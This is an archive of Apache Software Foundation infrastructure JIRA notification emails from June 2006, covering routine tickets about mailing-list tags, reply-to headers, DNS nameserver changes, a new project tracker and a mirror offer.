http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 23 19:14:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14312 invoked from network); 23 Jun 2006 19:14:01 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 19:14:01 -0000 Received: (qmail 96236 invoked by uid 500); 23 Jun 2006 19:13:59 -0000 Delivered-To: [email protected] Received: (qmail 95949 invoked by uid 500); 23 Jun 2006 19:13:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95930 invoked by uid 99); 23 Jun 2006 19:13:58 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:13:58 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 12:13:58 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 34199410007 for <[email protected]>; Fri, 23 Jun 2006 19:12:30 +0000 (GMT) Message-ID: <16819154.1151089950156.JavaMail.jira@brutus> Date: Fri, 23 Jun 2006 19:12:30 +0000 (GMT+00:00) From: "Garrett Rooney (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-860) XML errors in archived posts In-Reply-To: <162243.1151089230575.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-860?page=comments#action_12417550 ] Garrett Rooney commented on INFRA-860: -------------------------------------- For what it's worth, you can view the message in the message view screen, just remove the /ajax part of the url to get to it... > XML errors in archived posts > ---------------------------- > > Key: INFRA-860 > URL: http://issues.apache.org/jira/browse/INFRA-860 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: Mail Archives > Environment: Mozilla 1.7.12/Linux > Reporter: Martin Sebor > Priority: Critical > Attachments: [email protected] > > The following message fails to open in the archive browser due to an XML error: > http://mail-archives.apache.org/[email protected]%3e > The message was sent in response to this post: > http://[email protected]%3e -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 24 17:09:07 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35601 invoked from network); 24 Jun 2006 17:09:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2006 17:09:05 -0000 Received: (qmail 37582 invoked by uid 500); 24 Jun 2006 17:09:01 -0000 Delivered-To: [email protected] Received: (qmail 37351 invoked by uid 500); 24 Jun 2006 17:09:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37333 invoked by uid 99); 24 Jun 2006 17:08:59 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 10:08:59 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 10:08:59 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C41E1410007 for <[email protected]>; Sat, 24 Jun 2006 17:07:29 +0000 (GMT) Message-ID: <3614756.1151168849774.JavaMail.jira@brutus> Date: Sat, 24 Jun 2006 17:07:29 +0000 (GMT+00:00) From: "David N. Welton (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-861) Please add [Tags] to OFBiz mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Please add [Tags] to OFBiz mailing lists ---------------------------------------- Key: INFRA-861 URL: http://issues.apache.org/jira/browse/INFRA-861 Project: Infrastructure Type: New Feature Security: public (Regular issues) Components: Mailing Lists, Mail (qmail) Reporter: David N. Welton Priority: Minor Hi, The old OFBiz lists had tags in the subject lines. Some people have requested that those be added to the new lists as well, so I see no reason why not. If someone with the proper permissions would be so kind as to add these in, we would be grateful: [OFBiz] Dev [OFBiz] Users Thanks, Dave W. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sat Jun 24 19:33:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59880 invoked from network); 24 Jun 2006 19:33:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2006 19:33:04 -0000 Received: (qmail 13081 invoked by uid 500); 24 Jun 2006 19:33:02 -0000 Delivered-To: [email protected] Received: (qmail 12731 invoked by uid 500); 24 Jun 2006 19:33:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12703 invoked by uid 99); 24 Jun 2006 19:33:00 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 12:33:00 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 12:32:59 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3488D410007 for <[email protected]>; Sat, 24 Jun 2006 19:31:30 +0000 (GMT) Message-ID: <27626027.1151177490196.JavaMail.jira@brutus> Date: Sat, 24 Jun 2006 19:31:30 +0000 (GMT+00:00) From: "Rodent of Unusual Size (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-782) Need to switch nameservers for apachecon.com urgently In-Reply-To: <5684095.1146574846321.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-782?page=all ] Rodent of Unusual Size updated INFRA-782: ----------------------------------------- Attachment: ApacheCon.Com.db Attached is the current ApacheCon.Com zone file. The Apache.Org servers should master the zone and replace the non-Apache nameservers for it. Some ApacheCon concom people need to be given access to the zone file and instructions on how to update it. > Need to switch nameservers for apachecon.com urgently > ----------------------------------------------------- > > Key: INFRA-782 > URL: http://issues.apache.org/jira/browse/INFRA-782 > Project: Infrastructure > Type: Bug > Security: public(Regular issues) > Components: DNS > Reporter: Lars Eilebrecht > Priority: Critical > Attachments: ApacheCon.Com.db > > The apachecon.com is registered via dotser like all other apache domains, but we are still using the > old nameservers. > We have one lame nameserver (161.129.204.104 ns2.redhat.com) in the list and need to remove this > one urgently! > Removing the lame nameserver is just a workaround, the desired complete fix would be to completely switch all > nameservers for apachecon.com to the same nameservers we also use for our apache.org domains. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 25 01:08:04 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94672 invoked from network); 25 Jun 2006 01:08:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2006 01:08:03 -0000 Received: (qmail 83577 invoked by uid 500); 25 Jun 2006 01:08:01 -0000 Delivered-To: [email protected] Received: (qmail 83369 invoked by uid 500); 25 Jun 2006 01:08:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 83349 invoked by uid 99); 25 Jun 2006 01:08:01 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 18:08:01 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 18:08:00 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2F79E410007 for <[email protected]>; Sun, 25 Jun 2006 01:06:30 +0000 (GMT) Message-ID: <25152649.1151197590164.JavaMail.jira@brutus> Date: Sun, 25 Jun 2006 01:06:30 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-861) Please add [Tags] to OFBiz mailing lists In-Reply-To: <3614756.1151168849774.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-861?page=comments#action_12417653 ] Brett Porter commented on INFRA-861: ------------------------------------ You want subject "foo" to be [OFBiz] Dev foo or [OFBiz-dev] foo or something else? I'm not sure if any existing lists do [email protected]... is this desired for filtering (in which case, List-Id is much better), or visual separation in the same folder? > Please add [Tags] to OFBiz mailing lists > ---------------------------------------- > > Key: INFRA-861 > URL: http://issues.apache.org/jira/browse/INFRA-861 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mailing Lists, Mail (qmail) > Reporter: David N. Welton > Priority: Minor > > Hi, > The old OFBiz lists had tags in the subject lines. Some people have requested that those be added to the new lists as well, so I see no reason why not. If someone with the proper permissions would be so kind as to add these in, we would be grateful: > [OFBiz] Dev > [OFBiz] Users > Thanks, > Dave W. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 25 04:38:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 18634 invoked from network); 25 Jun 2006 04:38:09 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2006 04:38:09 -0000 Received: (qmail 57849 invoked by uid 500); 25 Jun 2006 04:38:08 -0000 Delivered-To: [email protected] Received: (qmail 57525 invoked by uid 500); 25 Jun 2006 04:38:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57511 invoked by uid 99); 25 Jun 2006 04:38:05 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 21:38:05 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 21:38:04 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 138C941000B for <[email protected]>; Sun, 25 Jun 2006 04:36:34 +0000 (GMT) Message-ID: <16537051.1151210194076.JavaMail.jira@brutus> Date: Sun, 25 Jun 2006 04:36:34 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-793) Add reply-to header to Tomcat digest lists In-Reply-To: <10519502.1147043960890.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-793?page=all ] Brett Porter closed INFRA-793: ------------------------------ Resolution: Fixed done for users and dev > Add reply-to header to Tomcat digest lists > ------------------------------------------ > > Key: INFRA-793 > URL: http://issues.apache.org/jira/browse/INFRA-793 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Mark Thomas > Assignee: Brett Porter > Priority: Minor > > Please enable the full message headers (including reply-to) for the following Tomcat mailing lists: > [email protected] > [email protected] > Thanks, > Mark -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Sun Jun 25 04:45:05 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20148 invoked from network); 25 Jun 2006 04:45:05 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 25 Jun 2006 04:45:05 -0000 Received: (qmail 60608 invoked by uid 500); 25 Jun 2006 04:45:04 -0000 Delivered-To: [email protected] Received: (qmail 60242 invoked by uid 500); 25 Jun 2006 04:45:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60230 invoked by uid 99); 25 Jun 2006 04:45:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 21:45:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 21:45:01 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 549AF410008 for <[email protected]>; Sun, 25 Jun 2006 04:43:31 +0000 (GMT) Message-ID: <21707251.1151210611343.JavaMail.jira@brutus> Date: Sun, 25 Jun 2006 04:43:31 +0000 (GMT+00:00) From: "Brett Porter (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (INFRA-734) Alias for commits to /xmlgraphics/commons In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-734?page=all ] Brett Porter closed INFRA-734: ------------------------------ Resolution: Fixed Assign To: Brett Porter done > Alias for commits to /xmlgraphics/commons > ----------------------------------------- > > Key: INFRA-734 > URL: http://issues.apache.org/jira/browse/INFRA-734 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Jeremias Maerki > Assignee: Brett Porter > > Please create an alias/redirect from [email protected] to [email protected]. We seem to already have that for site-commits@ -> commits@ and we need the same for commons-commits@. > I'll remove the special entry in asf-mailer.conf as soon as the redirect is in place. At the moment the "PROJECT" entry there tries to send commit mails to commons-commits@. > Thanks a lot! -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 26 06:19:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59957 invoked from network); 26 Jun 2006 06:19:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2006 06:19:07 -0000 Received: (qmail 96473 invoked by uid 500); 26 Jun 2006 06:19:03 -0000 Delivered-To: [email protected] Received: (qmail 96234 invoked by uid 500); 26 Jun 2006 06:19:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96222 invoked by uid 99); 26 Jun 2006 06:19:02 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 25 Jun 2006 23:19:02 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 25 Jun 2006 23:19:02 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2EBB57141EF for <[email protected]>; Mon, 26 Jun 2006 06:17:30 +0000 (GMT) Message-ID: <14793616.1151302650161.JavaMail.jira@brutus> Date: Mon, 26 Jun 2006 06:17:30 +0000 (GMT+00:00) From: "Jeff Turner (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-861) Please add [Tags] to OFBiz mailing lists In-Reply-To: <3614756.1151168849774.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-861?page=comments#action_12417730 ] Jeff Turner commented on INFRA-861: ----------------------------------- I don't think any other ASF lists do this, and it would be nice to keep this consistency. A "How to filter on List-Id" wiki page would be a good idea. With the old Ofbiz list, I had a procmail rule to strip the prefix: # Strip that annoying [OFBiz-*] in the subject :0 fhw | sed -re "s/\[OFBiz-[^]]*\]//" > Please add [Tags] to OFBiz mailing lists > ---------------------------------------- > > Key: INFRA-861 > URL: http://issues.apache.org/jira/browse/INFRA-861 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mailing Lists, Mail (qmail) > Reporter: David N. Welton > Priority: Minor > > Hi, > The old OFBiz lists had tags in the subject lines. Some people have requested that those be added to the new lists as well, so I see no reason why not. If someone with the proper permissions would be so kind as to add these in, we would be grateful: > [OFBiz] Dev > [OFBiz] Users > Thanks, > Dave W. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 26 09:12:16 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30055 invoked from network); 26 Jun 2006 09:12:13 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2006 09:12:13 -0000 Received: (qmail 1236 invoked by uid 500); 26 Jun 2006 09:12:05 -0000 Delivered-To: [email protected] Received: (qmail 797 invoked by uid 500); 26 Jun 2006 09:12:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 681 invoked by uid 99); 26 Jun 2006 09:12:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 02:12:03 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 02:12:03 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 1E7DD410009 for <[email protected]>; Mon, 26 Jun 2006 09:10:31 +0000 (GMT) Message-ID: <13663325.1151313031122.JavaMail.jira@brutus> Date: Mon, 26 Jun 2006 09:10:31 +0000 (GMT+00:00) From: "Gavin (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-848) Create new Jira Project for Incubator Preoject Abdera In-Reply-To: <29229504.1150608869861.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-848?page=comments#action_12417753 ] Gavin commented on INFRA-848: ----------------------------- Hi Guys, The abdera project is moving along, code is being committed to SVN. Peopleare currently providing patches to problems etc via the mailing lists. Apart from the archive headaches and lack of Jira to SVN tracking, this is not a good solution. So can someone say what needs to be done to get this issue sorted so Abdera can start using Jira for their needs. If more info is rewuired please let us know. Thanks > Create new Jira Project for Incubator Preoject Abdera > ----------------------------------------------------- > > Key: INFRA-848 > URL: http://issues.apache.org/jira/browse/INFRA-848 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: JIRA > Reporter: Gavin > > Hi All, > The new Incubator project 'Abdera' would like to have a new Jira Project. > I tried adding a new request for 'New Jira Project' but the system did not recognise any names I put in there for the Jira Admin. > As Mentors I tried putting in 'Garrett Rooney' and/or 'Paul Querna' as Jira Admin but would not be accepted by the system. > Also, here is a list of initial names to be granted 'dev' status to Abdera Jira (in addition to the two Admin named above). > Sam Ruby > Yoav Shapira > James M Snell > Elias Torres > Robert Yates > Gavin McDonald > Martin Cooper > Stephen Duncan -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 26 10:29:18 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52445 invoked from network); 26 Jun 2006 10:29:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2006 10:29:11 -0000 Received: (qmail 88756 invoked by uid 500); 26 Jun 2006 10:29:06 -0000 Delivered-To: [email protected] Received: (qmail 88498 invoked by uid 500); 26 Jun 2006 10:29:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 88481 invoked by uid 99); 26 Jun 2006 10:29:05 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 03:29:05 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 03:29:04 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D1D9C410007 for <[email protected]>; Mon, 26 Jun 2006 10:27:30 +0000 (GMT) Message-ID: <24337809.1151317650829.JavaMail.jira@brutus> Date: Mon, 26 Jun 2006 10:27:30 +0000 (GMT+00:00) From: "Tim Muthmann (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-820) new http mirror for apache.org with german location In-Reply-To: <18624937.1148647955639.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-820?page=comments#action_12417772 ] Tim Muthmann commented on INFRA-820: ------------------------------------ This mirror was only updated once a week. now it will be updated daily at 19:00 CET. do you need this mirror, please let me know if you do. thanks tim muthmann > new http mirror for apache.org with german location > --------------------------------------------------- > > Key: INFRA-820 > URL: http://issues.apache.org/jira/browse/INFRA-820 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Environment: 100mbit vserver, only apache-mirror is installed yet, german location, 40gig of harddisc, 1TB transferlimit > Reporter: Tim Muthmann > > URL of mirror: http://apache.webdesign-zdg.de > Country where the mirror is located: Germany > Contact email address: [email protected] > Update frequency: Daily > Rsync repository used: i dont know what you want to know?! > Approximate bandwidth: 100mBit > I have configured my HTTP server as requested (yes) > I have subscribed to the mirror maintainers mailing list (yes) > Dear Ladies and Gentlemen, > we would like you to display our logo (http://www.zentrum-der-gesundheit.de/images/zdg_logo_100_31.jpg) and send people to this adress: http://www.zentrum-der-gesundheit.de > Thanks a lot > Tim Muthmann -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Mon Jun 26 23:23:20 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1258 invoked from network); 26 Jun 2006 23:23:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 26 Jun 2006 23:23:19 -0000 Received: (qmail 98639 invoked by uid 500); 26 Jun 2006 23:23:06 -0000 Delivered-To: [email protected] Received: (qmail 98351 invoked by uid 500); 26 Jun 2006 23:23:05 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98339 invoked by uid 99); 26 Jun 2006 23:23:05 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 16:23:05 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 26 Jun 2006 16:23:04 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A678A410009 for <[email protected]>; Mon, 26 Jun 2006 23:21:31 +0000 (GMT) Message-ID: <4683470.1151364091679.JavaMail.jira@brutus> Date: Mon, 26 Jun 2006 23:21:31 +0000 (GMT+00:00) From: "Mark Thomas (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-793) Add reply-to header to Tomcat digest lists In-Reply-To: <10519502.1147043960890.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-793?page=comments#action_12417926 ] Mark Thomas commented on INFRA-793: ----------------------------------- Many thanks > Add reply-to header to Tomcat digest lists > ------------------------------------------ > > Key: INFRA-793 > URL: http://issues.apache.org/jira/browse/INFRA-793 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mailing Lists > Reporter: Mark Thomas > Assignee: Brett Porter > Priority: Minor > > Please enable the full message headers (including reply-to) for the following Tomcat mailing lists: > [email protected] > [email protected] > Thanks, > Mark -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Tue Jun 27 12:07:21 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13335 invoked from network); 27 Jun 2006 12:07:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 27 Jun 2006 12:07:18 -0000 Received: (qmail 6975 invoked by uid 500); 27 Jun 2006 12:07:06 -0000 Delivered-To: [email protected] Received: (qmail 6651 invoked by uid 500); 27 Jun 2006 12:07:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6583 invoked by uid 99); 27 Jun 2006 12:07:04 -0000 Received: from 